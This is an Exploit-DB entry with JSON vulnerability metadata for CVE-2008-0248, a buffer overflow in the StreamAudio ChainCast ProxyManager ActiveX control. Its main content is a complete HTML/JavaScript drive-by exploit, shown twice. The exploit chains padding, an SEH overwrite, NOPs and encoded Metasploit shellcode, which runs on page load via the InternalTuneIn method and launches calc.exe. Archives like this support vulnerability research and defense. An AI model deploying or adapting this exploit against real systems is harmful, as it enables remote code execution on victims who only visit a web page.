ID EDB-ID:4894
Type exploitdb
Reporter Elazar
Modified 2008-01-11T00:00:00
Description
StreamAudio ChainCast ProxyManager ccpm_0237.dll BoF Exploit. CVE-2008-0248. Remote exploit for windows platform
<!--
StreamAudio ChainCast ProxyManager ccpm_0237.dll SEH Overwrite Exploit
Written by e.b.
Shellcode is limited to about 680 bytes
Tested on Windows XP SP2(fully patched) English, IE6, ccpm_0237.dll 3.0.0.237
Thanks to h.d.m. and the Metasploit crew
-->
<html>
<head>
<title>StreamAudio ChainCast ProxyManager ccpm_0237.dll SEH Overwrite Exploit</title>
<script language="JavaScript" defer>
function Check() {
var buf = 'A';
while (buf.length <= 242) buf = buf + 'A';
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
"%4e%31%75%74%38%70%65%77%70%43");
var next_seh_pointer = unescape("%EB%06%90%90"); //2 byte jump
//oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop - retbis
//no SafeSEH
var seh_handler = unescape("%50%69%C9%74");
var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");
var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 + nop;
obj.InternalTuneIn(m, "", 0, 0, 0);
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:2253F320-AB68-4A07-917D-4F12D8884A06" height="0" width="0">
Unable to create object
</object>
</body>
</html>
# milw0rm.com [2008-01-11]
{"id": "EDB-ID:4894", "type": "exploitdb", "bulletinFamily": "exploit", "title": "StreamAudio ChainCast ProxyManager ccpm_0237.dll BoF Exploit", "description": "StreamAudio ChainCast ProxyManager ccpm_0237.dll BoF Exploit. CVE-2008-0248. Remote exploit for windows platform", "published": "2008-01-11T00:00:00", "modified": "2008-01-11T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/4894/", "reporter": "Elazar", "references": [], "cvelist": ["CVE-2008-0248"], "lastseen": "2016-01-31T22:01:41", "viewCount": 5, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-01-31T22:01:41", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-0248"]}], "modified": "2016-01-31T22:01:41", "rev": 2}, "vulnersScore": 7.4}, "sourceHref": "https://www.exploit-db.com/download/4894/", "sourceData": "<!-- \nStreamAudio ChainCast ProxyManager ccpm_0237.dll SEH Overwrite Exploit\nWritten by e.b.\nShellcode is limited to about 680 bytes\nTested on Windows XP SP2(fully patched) English, IE6, ccpm_0237.dll 3.0.0.237\nThanks to h.d.m. and the Metasploit crew \n-->\n<html>\n <head>\n <title>StreamAudio ChainCast ProxyManager ccpm_0237.dll SEH Overwrite Exploit</title>\n <script language=\"JavaScript\" defer>\n function Check() {\n \n var buf = 'A'; \n while (buf.length <= 242) buf = buf + 'A';\n\n\n// win32_exec - EXITFUNC=seh CMD=c:\\windows\\system32\\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com \nvar shellcode1 = unescape(\"%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49\" +\n \"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43\" +\n \"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32\" +\n \"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d\" +\n \"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e\" +\n \"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77\" +\n \"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36\" +\n \"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e\" +\n \"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78\" +\n \"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59\" +\n \"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46\" +\n \"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75\" +\n \"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a\" +\n \"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b\" +\n \"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35\" +\n \"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b\" +\n \"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71\" +\n \"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f\" +\n \"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33\" +\n \"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63\" +\n \"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73\" +\n \"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70\" +\n \"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66\" +\n \"%4e%31%75%74%38%70%65%77%70%43\");\n\n\n\t\tvar next_seh_pointer = unescape(\"%EB%06%90%90\"); //2 byte jump\n\n\n\t\t//oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop - retbis\n //no SafeSEH\n\t\tvar seh_handler = unescape(\"%50%69%C9%74\"); \n\t\n\t\tvar nop = unescape(\"%90%90%90%90%90%90%90%90%90%90%90%90\");\n\n\t\tvar m = buf + next_seh_pointer + seh_handler + nop + shellcode1 + nop;\n\t\t\n\t\tobj.InternalTuneIn(m, \"\", 0, 0, 0);\n \n } \n \n </script>\n </head>\n <body onload=\"JavaScript: return Check();\">\n <object id=\"obj\" classid=\"clsid:2253F320-AB68-4A07-917D-4F12D8884A06\" height=\"0\" width=\"0\">\n Unable to create object\n </object>\n </body>\n</html>\n\n# milw0rm.com [2008-01-11]\n", "osvdbidlist": ["40320"]}
{"cve": [{"lastseen": "2020-10-03T11:50:56", "description": "Buffer overflow in an ActiveX control in ccpm_0237.dll for StreamAudio ChainCast ProxyManager allows remote attackers to execute arbitrary code via a long URL argument to the InternalTuneIn method.", "edition": 3, "cvss3": {}, "published": "2008-01-12T02:46:00", "title": "CVE-2008-0248", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-0248"], "modified": "2017-09-29T01:30:00", "cpe": ["cpe:/a:streamaudio:chaincast_proxymanager_activex_control:*"], "id": "CVE-2008-0248", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0248", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:streamaudio:chaincast_proxymanager_activex_control:*:*:*:*:*:*:*:*"]}]}